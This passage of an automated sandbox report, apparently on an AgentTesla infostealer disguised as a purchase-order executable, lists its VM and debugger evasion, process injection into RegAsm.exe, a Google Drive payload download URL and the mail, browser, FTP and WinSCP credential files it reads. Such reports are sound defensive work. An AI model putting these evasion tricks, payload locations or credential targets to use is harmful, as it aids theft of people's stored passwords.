          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1S2E4RMU8PYTHWRTHVB17QS1CJAOOPUG3WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240672547.0000000000684000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1640Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9941
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdmJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
          Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240672547.0000000000684000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795B030 FindNextFileW,FindClose,FindFirstFileW,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657982504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeSystem information queried: ModuleInformation

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657960C0C GetProcessHeap,HeapAlloc,InitializeCriticalSectionAndSpinCount,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00746946 KiUserExceptionDispatcher,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797B530 SetUnhandledExceptionFilter,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797BF4C SetUnhandledExceptionFilter,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657963BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A30000
          Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795E0C4 AllocateAndInitializeSid,FreeSid,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError,
          Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795418C cpuid
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeCode function: 25_2_00007FF7E3A88ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790F3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795D874 RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError,

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: Yara matchFile source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter1Windows Service1Access Token Manipulation1Deobfuscate/Decode Files or Information1Credentials in Registry1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsService Execution2Logon Script (Windows)Windows Service1Obfuscated Files or Information2Security Account ManagerSystem Information Discovery127SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Process Injection113DLL Side-Loading1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSecurity Software Discovery441SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading3Cached Domain CredentialsVirtualization/Sandbox Evasion341VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion341DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection113/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
